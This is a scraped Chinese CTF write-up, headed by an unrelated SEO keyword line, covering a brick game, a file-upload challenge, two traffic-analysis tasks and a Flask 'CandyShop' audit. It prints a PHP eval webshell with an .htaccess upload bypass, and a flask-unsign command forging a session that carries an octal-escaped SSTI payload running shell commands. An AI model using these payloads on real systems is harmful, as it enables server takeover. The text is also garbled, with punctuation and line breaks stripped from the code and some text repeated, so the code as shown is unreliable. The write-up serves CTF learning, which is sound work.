seo网站模版,哈尔滨网站推广优化公司,wordpress 主题 使用教程,网络推广外包一年多少钱还是太菜了#xff0c;要经常练了
1.BrickGame
读源码可以看到时间的值是由js设定的#xff0c;所以控制台将timeleft的时间改成999999
通过游戏就可以得到flag 2.SQLUP
一道文件上传的题目#xff0c;在登陆页面我用admin和1登陆成功了#xff0c;但是按照正常的应该是…还是太菜了要经常练了
1.BrickGame
读源码可以看到时间的值是由js设定的所以控制台将timeleft的时间改成999999
通过游戏就可以得到flag 2.SQLUP
一道文件上传的题目在登陆页面我用admin和1登陆成功了但是按照正常的应该是要爆破用bp爆破得到下面的页面 登陆成功后点击头像就可以进行文件上传先上传一个php文件发现它限制带p的文件。
那就我想到了.htaccess文件和.user.ini文件我使用的.htaccess文件文件内容如下
AddType application/X-httped-php .gif
然后在上传一个1.gif文件gif文件内容就是一句话木马
?php eval($_POST[1]);?
然后访问urluploads/gif文件名
探针测试了一下发现上传成功了
之后连接蚁剑直接cat flag不行需要提权提权命令如下
tac -s RANDOM /flag 得到flag
3.漏洞探测流量解密
下载附件打开发现有两个阶段第二阶段的压缩包密码是第一阶段的攻击ip;
先在第一阶段找攻击ip
我们可以看到木马文件为gateway.php 然后在日志中可以看到上传gateway.php的主机ip地址为192.168.30.234 因此压缩包密码为192.168.30.234
打开压缩包还是一个流量文件用wireshark打开导出http流查看其中gateway.php文件中执行的命令和回显。 在某一个文件中找到了提示加密方式是RC4 在剩余文件中找到了key和raw即秘钥和密文 把raw前面的key删了用rc4解密就得到flag了 4.最安全的加密方式
下载附件打开用Wireshark打开流量点击左上角文件里的导出对象里的http将里面的文件全部导出 将每个文件依次使用记事本打开发现index(3).php和index(6).php文件里的内容与其他不同打开index(6).php发现rar头 然后进入wireshark将将它进行原始数据进行转换转换之后将红色部分的原始数据在010中创建一个16进制文件如何将红色部分的在010中按crlshiftv复制下来将多余的数据删掉前面找到rar部分最前面都删掉后面的---的全部删掉得到一个压缩包需要密码在另一个文件中找到密码 25ming
打开压缩包中的文档发现有一堆md5数据逐行解密md5即可得到flag
5.CandyShop
它给了源码对源码进行审计一下
import datetime
from flask import Flask, render_template, render_template_string, request, redirect, url_for, session, make_response
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired, Length
from flask_wtf import FlaskForm
import reapp Flask(__name__)app.config[SECRET_KEY] xxxxxxxclass RegistrationForm(FlaskForm):username StringField(Username, validators[DataRequired(), Length(min2, max20)])password PasswordField(Password, validators[DataRequired(), Length(min6, max20)])submit SubmitField(Register)class LoginForm(FlaskForm):username StringField(Username, validators[DataRequired(), Length(min2, max20)])password PasswordField(Password, validators[DataRequired(), Length(min6, max20)])submit SubmitField(Login)class Candy:def __init__(self, name, image):self.name nameself.image imageclass User:def __init__(self, username, password):self.username usernameself.password passworddef verify_password(self, username, password):return (self.usernameusername) (self.passwordpassword)
class Admin:def __init__(self):self.username self.identity def sanitize_inventory_sold(value):return re.sub(r[a-zA-Z_], , str(value))
def merge(src, dst):for k, v in src.items():if hasattr(dst, __getitem__):if dst.get(k) and type(v) dict:merge(v, dst.get(k))else:dst[k] velif hasattr(dst, k) and type(v) dict:merge(v, getattr(dst, k))else:setattr(dst, k, v)candies [Candy(nameLollipop, imageimages/candy1.jpg),Candy(nameChocolate Bar, imageimages/candy2.jpg),Candy(nameGummy Bears, imageimages/candy3.jpg)
]
users []
admin_user []
app.route(/register, methods[GET, POST])
def register():form RegistrationForm()if form.validate_on_submit():user User(usernameform.username.data, passwordform.password.data)users.append(user)return redirect(url_for(login))return render_template(register.html, formform)app.route(/login, methods[GET, POST])
def login():form LoginForm()if form.validate_on_submit():for u in users:if u.verify_password(form.username.data, form.password.data):session[username] form.username.datasession[identity] guestreturn redirect(url_for(home))return render_template(login.html, formform)inventory 500
sold 0
app.route(/home, methods[GET, POST])
def home():global inventory, soldmessage Noneusername session.get(username)identity session.get(identity)if not username:return redirect(url_for(register))if sold 10 and sold 500:sold 0inventory 500message But you have bought too many candies!return render_template(home.html, inventoryinventory, soldsold, messagemessage, candiescandies)if request.method POST:action request.form.get(action)if action buy_candy:if inventory 0:inventory - 3sold 3if inventory 0:message All candies are sold out!if sold 500:with open(secret.txt, r) as file:message file.read()return render_template(home.html, inventoryinventory, soldsold, messagemessage, candiescandies)app.route(/admin, methods[GET, POST])
def admin():username session.get(username)identity session.get(identity)if not username or identity ! admin:return redirect(url_for(register))admin Admin()merge(session,admin)admin_user.append(admin)return render_template(admin.html, viewindex)app.route(/admin/view_candies, methods[GET, POST])
def view_candies():username session.get(username)identity session.get(identity)if not username or identity ! admin:return redirect(url_for(register))return render_template(admin.html, viewcandies, candiescandies)app.route(/admin/add_candy, methods[GET, POST])
def add_candy():username session.get(username)identity session.get(identity)if not username or identity ! admin:return redirect(url_for(register))candy_name request.form.get(name)candy_image request.form.get(image)if candy_name and candy_image:new_candy Candy(namecandy_name, imagecandy_image)candies.append(new_candy)return render_template(admin.html, viewadd_candy)app.route(/admin/view_inventory, methods[GET, POST])
def view_inventory():username session.get(username)identity session.get(identity)if not username or identity ! admin:return redirect(url_for(register))inventory_value sanitize_inventory_sold(inventory)sold_value sanitize_inventory_sold(sold)return render_template_string(商店库存: inventory_value 已售出 sold_value)app.route(/admin/add_inventory, methods[GET, POST])
def add_inventory():global inventoryusername session.get(username)identity session.get(identity)if not username or identity ! admin:return redirect(url_for(register))if request.form.get(add):num request.form.get(add)inventory int(num)return render_template(admin.html, viewadd_inventory)app.route(/)
def index():return render_template(index.html)if __name__ __main__:app.run(debugFalse, host0.0.0.0, port1337)找出关键代码
# 获取flag大致路径的
if request.method POST:action request.form.get(action)if action buy_candy:if inventory 0:inventory - 3sold 3if inventory 0:message All candies are sold out!if sold 500:with open(secret.txt, r) as file:message file.read()# 造成原型链污染处
def merge(src, dst):for k, v in src.items():if hasattr(dst, __getitem__):if dst.get(k) and type(v) dict:merge(v, dst.get(k))else:dst[k] velif hasattr(dst, k) and type(v) dict:merge(v, getattr(dst, k))else:setattr(dst, k, v)
....
admin Admin()
merge(session,admin)
....# SSTI处
def view_inventory():username session.get(username)identity session.get(identity)if not username or identity ! admin:return redirect(url_for(register))inventory_value sanitize_inventory_sold(inventory)sold_value sanitize_inventory_sold(sold)return render_template_string(商店库存: inventory_value 已售出 sold_value)# SSTI Waf处
def sanitize_inventory_sold(value):return re.sub(r[a-zA-Z_], , str(value))
第二段可以上网搜一下明显的原型链污染之后我也会了解相关知识出一篇文章
在第一段代码上面有这样的一段代码 if sold 10 and sold 500:sold 0inventory 500message But you have bought too many candies!return render_template(home.html, inventoryinventory, soldsold, messagemessage, candiescandies)就是只要sold10就会置0所以这里用session伪造去得到secret.txt
这里爆破key的值为a123456然后就可以来伪造session,通过伪造sold超过500获取一下secret.txt的内容 爆破相关知识如下
Flask之session伪造(从某平台学习Session身份伪造)_session 存储身份 是否伪造-CSDN博客
在/admin/view_inventory有渲染接口但是下面限制了不能有字母
所以需要别的方法进行绕过绕过方法可以看下面这篇文章
https://ctftime.org/writeup/22159
最后测试出用八进制绕过这里的限制然后再通过flask unsign工具来伪造一下session
网址https://github.com/Paradoxis/Flask-Unsign
flask-unsign --sign --cookie {identity: admin, username: test3,__init__:{__global
s__:{sold:857,inventory:{{\\[\\\137\\137\\143\\154\\141\\163\\163\\137\\137\][\\\137\\137\\142\\141\\163\\145\\163\\137\\137\][0][\\\137\\137\\163\\165\\142\\143\\154\\141\\163\\163\\145\\163\\137\\137\]()[133][\\\137\\137\\151\\156\\151\\164\\137\\137\][\\\137\\137\\147\\154\\157\\142\\141\\154\\163\\137\\137\][\\\137\\137\\142\\165\\151\\154\\164\\151\\156\\163\\137\\137\][\\\145\\166\\141\\154\](\\\137\\137\\151\\155\\160\\157\\162\\164\\137\\137\\050\\042\\157\\163\\042\\051\\056\\160\\157\\160\\145\\156\\050\\042\\167\\150\\157\\141\\155\\151\\042\\051\\056\\162\\145\\141\\144\\050\\051\)}}}}} --secret a123456 在前面中已经找到了/tmp/目录接着用这个进行执行命令
不断进行ls得到目录在ls /tmp/
15021e2b855f8e2ab83431c5d8ad4e75
得到下一个目录直到得到flag
这个题两个知识点session爆破和伪造无字母绕过
